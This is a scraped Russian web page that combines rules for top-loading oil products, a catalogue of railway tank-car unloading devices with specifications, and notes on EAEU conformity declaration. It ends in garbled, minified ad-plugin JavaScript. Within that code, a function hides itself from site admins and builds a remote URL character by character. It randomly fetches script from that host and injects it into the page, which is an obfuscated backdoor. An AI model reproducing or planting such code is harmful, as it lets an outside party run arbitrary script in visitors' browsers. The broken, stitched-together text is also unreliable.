Устройства верхнего налива на эстакадах для высоковязких, кристаллизирующихся продуктов и продуктов, способных образовывать твердые гидраты должны быть оборудованы обогревающими устройствами, поддерживающими температуру наливного устройства выше температуры кристаллизации или образования гидратов. Для этого используется электрообогрев устройства или обогрев паром.

Участки наливных устройств, которые опускаются в горловину цистерны, не обогреваются.

Верхний налив легковоспламеняющихся и горючих жидкостей должен быть закрытым, а сжиженных углеводородных газов и легковоспламеняющихся жидкостей под давлением — герметичным.

Устройства для верхнего налива легковоспламеняющихся и горючих жидкостей, относящихся к вредным веществам 1 и 2 класса опасности, должен быть герметичным. Классификация вредных веществ принимается по ГОСТ 12.1.007-76.

Для каждого вида наливаемого продукта, когда недопустимо смешение его с другими продуктами должны быть предусмотрены самостоятельные устройства верхнего налива.

Источник: http://technology-rf.ru/catalog/oborudovanie_dlya_sliva_naliva/verhniy_naliv_nefteproduktov/

Устройство нижнего слива — ТЯЖПРОМКОМПЛЕКТ

Устройство нижнего слива УНС
Модификация УНС-75 УНС-100 УНС-150 УНСА-75 УНСА-100 УНСА-150
Условный проход DN 75 100 150 75 100 150
Рабочее давление, Мпа, не более 0,4
Масса, кг, не более 9,2 9,5 11,5 8,6 8,9 9,5
Устройство нижнего слива УНС предназначено для слива (налива) нефтепродуктов из вагона-цистерны в мобильные ёмкости.
Устройство сливное УС-80
Модификация УСН-80
Условный проход DN 80
Рабочее давление, Мпа, не более 0,25
Масса, кг, не более 27
Предназначено для слива бензина и дизельного топлива в резервуар АЗС.
Устройство нижнего слива УСН
Модификация УСН-150 УСН-175
Условный проход DN 150 175
Условное давление, МПа, не более 0,4
Масса, кг, не более 120 290
Предназначена для нижнего слива нефти и нефтепродуктов из железнодорожных вагонов-цистерн с универсальными сливными приборами.Установка состоит из шарнирно соединенных труб, оканчивающихся, с одной стороны, опорным патрубком с присоединительным фланцем, а с другой стороны —присоединительной головкой. Оригинальная конструкция 5 шарнирных соединений обеспечивает долговечность и надежность изделия в эксплуатации.Установку монтируют на фронте слива на бетонном основании с помощью фундаментных болтов. Оригинальная конструкция шарниров обеспечивает долговечность и надежность изделия в эксплуатации. Имеются модификации с подогревающей рубашкой.
Устройство УСН 175ГП-263 с диаметром условного прохода 200 мм
Диаметр условного прохода, мм 200
Условное давление, МПа (кгс/см2) 0,6 (6)
Расчётная пропускная способность, м3/час, не более:—светлых нефтепродуктов —тёмных нефтепродуктов 435 780
Зона действия, м 6
Масса, кг, не более: 285
Устройство УСН 175ГП-263 предназначено для нижнего слива нефти и нефтепродуктов из железнодорожных цистерн, представляет собой шарнирный трубопровод с подогревающей рубашкой, опорным патрубком и присоединительной головкой, а также оборудовано внутренним напорным трубопроводом и телескопическим гидромонитором с сопловой головкой.
Устройство УНЖ
Модификация УНЖ6-100АС-02 УНЖ-100АС УНЖ-100Т
Диаметр условного прохода, мм 100
Рабочее давление, МПа (кг/см2), не более 1,0 (10)
Расчётная пропускная способность, м3/час 150 80–160 50–80
Масса, кг, не более 350 600 500
  • УНЖ-6 предназначено для герметизированного верхнего налива нефти и нефтепродуктов в железнодорожные цистерны с отводом паров из зоны налива.
  • Отвод паров производится через отдельный герметичный шарнирный трубопровод, не требующий замены в течение срока службы устройства.
  • УНЖ-1 предназначено для налива светлых нефтепродуктов в железнодорожные цистерны.
  • Устройство УНЖ-100Т предназначено для налива темных нефтепродуктов в железнодорожные цистерны.

Заказать товар

Оформите заявку на сайте, мы свяжемся с вами в ближайшее время и ответим на все интересующие вопросы.

Источник: https://tpkom.com/catalog/rezervuary_i_rezervuarnoe_oborudovanie/ustroystva_sliva_i_naliva/ustroystvo_nizhnego_sliva/

Декларирование устройства слива и налива « Оборудование

Устройство слива и налива — оборудование, предназначенное для верхнего или нижнего слива, или налива, перекачки бензина, дизельного топлива, нефти и вязких нефтепродуктов в авто- и железнодорожные цистерны, а также заправки транспортных средств.

При сливе используются:

  • нижний сливной прибор;
  • переносный желоб;
  • центральный желоб;
  • трубопровод;
  • «нулевой» резервуар;
  • шарнирно-сочлененные трубы;
  • коллектор;
  • соединительный трубопровод;
  • сливной стояк;
  • насос;
  • приемный резервуар.

При наливе используются:

  • цистерна;
  • шланг;
  • наливной стояк;
  • коллектор;
  • телескопическая труба;
  • герметизирующая крышка;
  • линия отвода паровоздушной смеси.

Декларация соответствия ЕАЭС на устройство слива и налива

Устройства слива-налива подлежат обязательному декларированию для подтверждения соответствия требованиям:

  • ТР ТС 010/2011 О безопасности машин и оборудования.

Схемы декларирования:

  • 1Д, 3Д — для серийной продукции;
  • 2Д, 4Д — для партии оборудования или единичного экземпляра;
  • 5Д — для оборудования, применяемого на опасных производственных объектах;
  • 6Д — для оборудования серийного выпуска при наличии у изготовителя СМК.

Схемы включают:

  • формирование комплекта документов;
  • осуществление производственного контроля (для 1Д, 3Д, 5Д, 6Д);
  • испытания образцов в испытательной лаборатории (для 1Д, 2Д) или аккредитованной испытательной лаборатории (центре);
  • прием и регистрацию декларации о соответствии.

При желании вместо декларации можно оформить сертификат соответствия Евразийского экономического союза (ЕАЭС) на устройство слива и налива.

Классификация устройства слива и налива по кодам ОКПД2 и ТН ВЭД

Код по ОКПД2:

  • 28.99.39.190 Оборудование специального назначения прочее, не включенное в другие группировки.

Коды по ТН ВЭД:

  • 8479 89 970 8 — прочие;
  • 8481 80 819 9 — прочие.

Используемые стандарты для устройства слива и налива

  • ГОСТ 20772-81 Устройства присоединительные для технических средств заправки, перекачки, слива-налива, транспортирования и хранения нефти и нефтепродуктов. Типы. Основные параметры и размеры. Общие технические требования;

Источник: http://www.TestProm.ru/artprod/oborudovanie/deklarirovanie-ustroystva-sliva-i-naliva

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};